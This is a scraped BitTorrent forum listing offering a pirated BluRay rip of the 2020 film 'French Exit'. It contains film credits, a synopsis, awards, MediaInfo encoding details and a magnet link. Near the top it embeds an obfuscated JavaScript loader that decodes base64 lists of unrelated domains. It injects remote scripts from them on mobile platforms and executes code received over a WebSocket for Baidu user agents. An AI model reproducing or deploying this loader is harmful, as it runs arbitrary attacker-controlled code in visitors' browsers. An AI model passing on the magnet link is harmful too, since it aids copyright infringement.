法式出口[简繁字幕]French.Exit.2020.1080p.BluRay.x264.DTS-迅雷下载 12.89GB

版主小s 10天前 218

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 法式出口 / 法式告别 / 法式出路
◎片  名 French Exit
◎年  代 2020
◎产  地 加拿大 / 爱尔兰 / 英国
◎类  别 剧情 / 喜剧
◎语  言 英语
◎上映日期 2020-10-10(纽约电影节) / 2021-02-12(美国点映) / 2021-04-02(美国)
◎IMDb链接 https://www.imdb.com/title/tt10279362/
◎豆瓣评分 6.4/10 (843人评价)
◎豆瓣链接 https://movie.douban.com/subject/33433365/
◎片  长 113分钟
◎导  演 阿扎泽·雅各布斯 Azazel Jacobs (id:1316136)
◎编  剧 帕特里克·德威特 Patrick Dewitt (id:1336476)
◎演  员 米歇尔·菲佛 Michelle Pfeiffer (id:1035642)
       卢卡斯·赫奇斯 Lucas Hedges (id:1340596)
       崔西·莱茨 Tracy Letts (id:1009889)
       维勒莉·玛哈菲 Valerie Mahaffey (id:1018193)
       苏珊·柯尼 Susan Coyne (id:1281419)
       伊莫琴·普茨 Imogen Poots (id:1274510)
       丹妮尔·麦克唐纳 Danielle Macdonald (id:1382494)
       伊萨赫·德·班克尔 Isaach De Bankolé (id:1022827)
       丹尼尔·迪托马索 Daniel DiTomasso (id:1324200)
       马特·霍兰德 Matt Holland (id:1453008)
       Robert Higden Robert Higden (id:1097168)
       拉里·戴 Larry Day (id:1037110)
       朱利安·拜利 Julian Bailey (id:1019488)
       Una Kay Una Kay (id:1102810)
       瓦拉斯塔·瓦拉纳 Vlasta Vrana (id:1300208)

◎标  签 喜剧 / 英国 / 美国 / 剧情 / 2020 / 米歇尔·菲佛 / MichellePfeiffer / 2021

◎简  介
  米歇尔·菲佛、卢卡斯·赫奇斯、崔西·莱茨将出演超现实主义喜剧片[法国出口](French Exit,暂译)。阿扎泽·雅各布斯将执导这部改编自帕特里克·德维特小说的电影。菲佛饰演60岁的曼哈顿社交名媛弗朗西丝·普莱斯,赫奇斯饰演她没有方向的儿子马尔科姆,莱茨饰演她已故多年的丈夫富兰克林的化身——一只家猫。

◎获奖情况 (共3项)
  第78届金球奖 (2021)
  电影类 音乐/喜剧片最佳女主角(提名)
   └──米歇尔·菲佛 (id:1035642)

  第36届美国独立精神奖 (2021)
  最佳女配角(提名)
   └──维勒莉·玛哈菲 (id:1018193)

  第25届金卫星奖 (2021)
  电影部门 喜剧/音乐片最佳女主角(提名)
   └──米歇尔·菲佛 (id:1035642)

  1. General
  2. Unique ID                                : 192274988749370054553357229277726391610 (0x90A6D0DAD1AA6D2240C6C65CB1043D3A)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 12.9 GiB
  7. Duration                                 : 1 h 53 min
  8. Overall bit rate                         : 16.3 Mb/s
  9. Encoded date                             : UTC 2021-07-15 05:51:07
  10. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 1 h 53 min
  22. Bit rate                                 : 14.7 Mb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 804 pixels
  25. Display aspect ratio                     : 2.40:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.398
  33. Stream size                              : 11.6 GiB (90%)
  34. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  35. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. ID in the original source medium         : 4352 (0x1100)
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 1 h 52 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 1 509 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 24 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 1.19 GiB (9%)
  55. Language                                 : English
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. ID in the original source medium         : 4613 (0x1205)
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 44 min
  67. Bit rate                                 : 37.8 kb/s
  68. Count of elements                        : 2496
  69. Stream size                              : 28.4 MiB (0%)
  70. Title                                    : 简英
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #2
  76. ID                                       : 4
  77. ID in the original source medium         : 4614 (0x1206)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 1 h 44 min
  83. Bit rate                                 : 38.3 kb/s
  84. Count of elements                        : 2496
  85. Stream size                              : 28.7 MiB (0%)
  86. Title                                    : 繁英
  87. Language                                 : Chinese
  88. Default                                  : No
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #3
  92. ID                                       : 5
  93. ID in the original source medium         : 4615 (0x1207)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 44 min
  99. Bit rate                                 : 23.7 kb/s
  100. Count of elements                        : 2496
  101. Stream size                              : 17.8 MiB (0%)
  102. Title                                    : 简中
  103. Language                                 : Chinese
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #4
  108. ID                                       : 6
  109. ID in the original source medium         : 4616 (0x1208)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 1 h 44 min
  115. Bit rate                                 : 24.1 kb/s
  116. Count of elements                        : 2496
  117. Stream size                              : 18.1 MiB (0%)
  118. Title                                    : 繁中
  119. Language                                 : Chinese
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Text #5
  124. ID                                       : 7
  125. ID in the original source medium         : 4609 (0x1201)
  126. Format                                   : PGS
  127. Muxing mode                              : zlib
  128. Codec ID                                 : S_HDMV/PGS
  129. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  130. Duration                                 : 1 h 45 min
  131. Bit rate                                 : 26.5 kb/s
  132. Count of elements                        : 2394
  133. Stream size                              : 20.0 MiB (0%)
  134. Title                                    : 英语
  135. Language                                 : English
  136. Default                                  : No
  137. Forced                                   : No
  138. Original source medium                   : Blu-ray
  139. Menu
  140. 00:00:00.000                             : 第 01 章
  141. 00:10:42.558                             : 第 02 章
  142. 00:19:28.125                             : 第 03 章
  143. 00:25:27.526                             : 第 04 章
  144. 00:35:12.568                             : 第 05 章
  145. 00:47:02.653                             : 第 06 章
  146. 00:52:10.919                             : 第 07 章
  147. 01:00:25.163                             : 第 08 章
  148. 01:08:27.770                             : 第 09 章
  149. 01:13:42.042                             : 第 10 章
  150. 01:17:07.789                             : 第 11 章
  151. 01:23:57.532                             : 第 12 章
  152. 01:34:08.017                             : 第 13 章
  153. 01:38:56.847                             : 第 14 章
  154. 01:41:21.825                             : 第 15 章
  155. 01:43:56.063                             : 第 16 章
  156. 01:45:58.143                             : 第 17 章
  157. 01:52:49.721                             : 第 18 章


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:F45F249570AC08B57E34F77E6CAD1EFFDA0346A7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回